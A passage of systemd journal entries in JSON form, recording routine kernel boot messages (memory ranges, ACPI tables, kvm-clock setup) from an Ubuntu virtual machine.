"_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " A0000-BFFFF uncachable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f;b=e2b08827b5804427b422c10c84f1567e;m=55823b;t=5bd16dd1901a2;x=3ba105f65bb369a0", "__REALTIME_TIMESTAMP" : "1615280779887010", "__MONOTONIC_TIMESTAMP" : "5603899", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " C0000-FFFFF write-protect" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20;b=e2b08827b5804427b422c10c84f1567e;m=558244;t=5bd16dd1901ab;x=bf02c2451cebc555", "__REALTIME_TIMESTAMP" : "1615280779887019", "__MONOTONIC_TIMESTAMP" : "5603908", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR variable ranges enabled:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21;b=e2b08827b5804427b422c10c84f1567e;m=558250;t=5bd16dd1901b8;x=3a0ef5af2fac8430", "__REALTIME_TIMESTAMP" : "1615280779887032", "__MONOTONIC_TIMESTAMP" : "5603920", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 0 base 0080000000 mask FF80000000 uncachable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22;b=e2b08827b5804427b422c10c84f1567e;m=558259;t=5bd16dd1901c1;x=3662b4af19fec2c4", "__REALTIME_TIMESTAMP" : "1615280779887041", "__MONOTONIC_TIMESTAMP" : "5603929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 1 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23;b=e2b08827b5804427b422c10c84f1567e;m=558265;t=5bd16dd1901cc;x=d9edabc73fc9138c", "__REALTIME_TIMESTAMP" : "1615280779887052", "__MONOTONIC_TIMESTAMP" : "5603941", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 2 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24;b=e2b08827b5804427b422c10c84f1567e;m=55826d;t=5bd16dd1901d5;x=a1281317ddbe980", "__REALTIME_TIMESTAMP" : "1615280779887061", "__MONOTONIC_TIMESTAMP" : "5603949", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 3 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25;b=e2b08827b5804427b422c10c84f1567e;m=558276;t=5bd16dd1901de;x=c3c4e867250818c7", "__REALTIME_TIMESTAMP" : "1615280779887070", "__MONOTONIC_TIMESTAMP" : "5603958", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 4 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26;b=e2b08827b5804427b422c10c84f1567e;m=55827f;t=5bd16dd1901e6;x=d74e81ef909ae85c", "__REALTIME_TIMESTAMP" : "1615280779887078", "__MONOTONIC_TIMESTAMP" : "5603967", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 5 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27;b=e2b08827b5804427b422c10c84f1567e;m=558288;t=5bd16dd1901ef;x=ecd4fa263890de6e", "__REALTIME_TIMESTAMP" : "1615280779887087", "__MONOTONIC_TIMESTAMP" : "5603976", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 6 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28;b=e2b08827b5804427b422c10c84f1567e;m=558291;t=5bd16dd1901f8;x=f8cc968f8f9e390b", "__REALTIME_TIMESTAMP" : "1615280779887096", "__MONOTONIC_TIMESTAMP" : "5603985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 7 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29;b=e2b08827b5804427b422c10c84f1567e;m=55829d;t=5bd16dd190205;x=d8b4a1c3e4d93a07", "__REALTIME_TIMESTAMP" : "1615280779887109", "__MONOTONIC_TIMESTAMP" : "5603997", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/PAT: Configuration [0-7]: WB WC UC- UC WB WP UC- WT " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a;b=e2b08827b5804427b422c10c84f1567e;m=5582b6;t=5bd16dd19021d;x=a40abd55b189474a", "__REALTIME_TIMESTAMP" : "1615280779887133", "__MONOTONIC_TIMESTAMP" : "5604022", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "found SMP MP-table at [mem 0x000f6a80-0x000f6a8f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b;b=e2b08827b5804427b422c10c84f1567e;m=5582be;t=5bd16dd190226;x=509ad16951a77cd3", "__REALTIME_TIMESTAMP" : "1615280779887142", "__MONOTONIC_TIMESTAMP" : "5604030", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Scanning 1 areas for low memory corruption" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c;b=e2b08827b5804427b422c10c84f1567e;m=5582ca;t=5bd16dd190231;x=fa904621ba25687f", "__REALTIME_TIMESTAMP" : "1615280779887153", "__MONOTONIC_TIMESTAMP" : "5604042", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Using GB pages for direct mapping" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d;b=e2b08827b5804427b422c10c84f1567e;m=5582eb;t=5bd16dd190253;x=189beb4897315588", "__REALTIME_TIMESTAMP" : "1615280779887187", "__MONOTONIC_TIMESTAMP" : "5604075", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c740000, 0x3c740fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e;b=e2b08827b5804427b422c10c84f1567e;m=5582f5;t=5bd16dd19025d;x=e5585ff116a8653d", "__REALTIME_TIMESTAMP" : "1615280779887197", "__MONOTONIC_TIMESTAMP" : "5604085", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c741000, 0x3c741fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f;b=e2b08827b5804427b422c10c84f1567e;m=558303;t=5bd16dd19026a;x=d13f73606857f1af", "__REALTIME_TIMESTAMP" : "1615280779887210", "__MONOTONIC_TIMESTAMP" : "5604099", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c742000, 0x3c742fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30;b=e2b08827b5804427b422c10c84f1567e;m=55830c;t=5bd16dd190274;x=261516535cb52e0e", "__REALTIME_TIMESTAMP" : "1615280779887220", "__MONOTONIC_TIMESTAMP" : "5604108", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c743000, 0x3c743fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31;b=e2b08827b5804427b422c10c84f1567e;m=558315;t=5bd16dd19027d;x=8216a6812b4e768a", "__REALTIME_TIMESTAMP" : "1615280779887229", "__MONOTONIC_TIMESTAMP" : "5604117", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c744000, 0x3c744fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32;b=e2b08827b5804427b422c10c84f1567e;m=55831e;t=5bd16dd190286;x=60eae5c564d793ce", "__REALTIME_TIMESTAMP" : "1615280779887238", "__MONOTONIC_TIMESTAMP" : "5604126", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c745000, 0x3c745fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33;b=e2b08827b5804427b422c10c84f1567e;m=558327;t=5bd16dd19028e;x=d9f5ca398cadfe66", "__REALTIME_TIMESTAMP" : "1615280779887246", "__MONOTONIC_TIMESTAMP" : "5604135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "RAMDISK: [mem 0x35a8b000-0x36d3cfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34;b=e2b08827b5804427b422c10c84f1567e;m=558330;t=5bd16dd190297;x=3d2a38af987659e7", "__REALTIME_TIMESTAMP" : "1615280779887255", "__MONOTONIC_TIMESTAMP" : "5604144", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: Early table checksum verification disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35;b=e2b08827b5804427b422c10c84f1567e;m=558339;t=5bd16dd1902a0;x=d7f562e2ee7b8782", "__REALTIME_TIMESTAMP" : "1615280779887264", "__MONOTONIC_TIMESTAMP" : "5604153", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: RSDP 0x00000000000F6880 000014 (v00 BOCHS )" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=36;b=e2b08827b5804427b422c10c84f1567e;m=558345;t=5bd16dd1902ad;x=9aa520c7db1dadf7", "__REALTIME_TIMESTAMP" : "1615280779887277", "__MONOTONIC_TIMESTAMP" : "5604165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: RSDT 0x000000007FFE1504 00002C (v01 BOCHS BXPCRSDT 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=37;b=e2b08827b5804427b422c10c84f1567e;m=55834e;t=5bd16dd1902b6;x=61ec46507e358bdf", "__REALTIME_TIMESTAMP" : "1615280779887286", "__MONOTONIC_TIMESTAMP" : "5604174", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: FACP 0x000000007FFE1418 000074 (v01 BOCHS BXPCFACP 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=38;b=e2b08827b5804427b422c10c84f1567e;m=55835b;t=5bd16dd1902c2;x=9365a8a8002a3511", "__REALTIME_TIMESTAMP" : "1615280779887298", "__MONOTONIC_TIMESTAMP" : "5604187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: DSDT 0x000000007FFE0040 0013D8 (v01 BOCHS BXPCDSDT 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=39;b=e2b08827b5804427b422c10c84f1567e;m=558364;t=5bd16dd1902cb;x=964af1c7dae52a2a", "__REALTIME_TIMESTAMP" : "1615280779887307", "__MONOTONIC_TIMESTAMP" : "5604196", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: FACS 0x000000007FFE0000 000040" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3a;b=e2b08827b5804427b422c10c84f1567e;m=55836d;t=5bd16dd1902d4;x=cf945d10e52f8f74", "__REALTIME_TIMESTAMP" : "1615280779887316", "__MONOTONIC_TIMESTAMP" : "5604205", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: APIC 0x000000007FFE148C 000078 (v01 BOCHS BXPCAPIC 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3b;b=e2b08827b5804427b422c10c84f1567e;m=558376;t=5bd16dd1902dd;x=edf10699cb629bdf", "__REALTIME_TIMESTAMP" : "1615280779887325", "__MONOTONIC_TIMESTAMP" : "5604214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: Local APIC address 0xfee00000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3c;b=e2b08827b5804427b422c10c84f1567e;m=55838f;t=5bd16dd1902f7;x=e9018680f2c50874", "__REALTIME_TIMESTAMP" : "1615280779887351", "__MONOTONIC_TIMESTAMP" : "5604239", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "No NUMA configuration found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3d;b=e2b08827b5804427b422c10c84f1567e;m=5583a9;t=5bd16dd190310;x=b35bf5c4d6572fc4", "__REALTIME_TIMESTAMP" : "1615280779887376", "__MONOTONIC_TIMESTAMP" : "5604265", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Faking a node at [mem 0x0000000000000000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3e;b=e2b08827b5804427b422c10c84f1567e;m=5583b3;t=5bd16dd19031a;x=818beee0419abbe8", "__REALTIME_TIMESTAMP" : "1615280779887386", "__MONOTONIC_TIMESTAMP" : "5604275", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "NODE_DATA(0) allocated [mem 0x7ffb1000-0x7ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3f;b=e2b08827b5804427b422c10c84f1567e;m=5583c7;t=5bd16dd19032e;x=51812eea7aa9592c", "__REALTIME_TIMESTAMP" : "1615280779887406", "__MONOTONIC_TIMESTAMP" : "5604295", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: cpu 0, msr 0:7ff30001, primary cpu clock" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=40;b=e2b08827b5804427b422c10c84f1567e;m=5583d0;t=5bd16dd190338;x=939313d67c299460", "__REALTIME_TIMESTAMP" : "1615280779887416", "__MONOTONIC_TIMESTAMP" : "5604304", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: Using msrs 4b564d01 and 4b564d00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=41;b=e2b08827b5804427b422c10c84f1567e;m=5583da;t=5bd16dd190341;x=cf0e2f81d211a7f4", "__REALTIME_TIMESTAMP" : "1615280779887425", "__MONOTONIC_TIMESTAMP" : "5604314", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: using sched offset of 11561140508 cycles" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=42;b=e2b08827b5804427b422c10c84f1567e;m=5583e6;t=5bd16dd19034e;x=d9b58dae827177ce", "__REALTIME_TIMESTAMP" : "1615280779887438", "__MONOTONIC_TIMESTAMP" : "5604326", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=43;b=e2b08827b5804427b422c10c84f1567e;m=5583f0;t=5bd16dd190357;x=c9b43b89a213bb5a", "__REALTIME_TIMESTAMP" : "1615280779887447", "__MONOTONIC_TIMESTAMP" : "5604336", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Zone ranges:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=44;b=e2b08827b5804427b422c10c84f1567e;m=5583f9;t=5bd16dd190361;x=416a4da24a7374a1", "__REALTIME_TIMESTAMP" : "1615280779887457", "__MONOTONIC_TIMESTAMP" : "5604345", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " DMA [mem 0x0000000000001000-0x0000000000ffffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=45;b=e2b08827b5804427b422c10c84f1567e;m=558403;t=5bd16dd19036a;x=662b5e9ad1909f5e", "__REALTIME_TIMESTAMP" : "1615280779887466", "__MONOTONIC_TIMESTAMP" : "5604355", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " DMA32 [mem 0x0000000001000000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=46;b=e2b08827b5804427b422c10c84f1567e;m=55840c;t=5bd16dd190374;x=3a39ce413a58fd84", "__REALTIME_TIMESTAMP" : "1615280779887476", "__MONOTONIC_TIMESTAMP" : "5604364", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Normal empty" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=47;b=e2b08827b5804427b422c10c84f1567e;m=558416;t=5bd16dd19037d;x=2500f0e789913fc2", "__REALTIME_TIMESTAMP" : "1615280779887485", "__MONOTONIC_TIMESTAMP" : "5604374", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 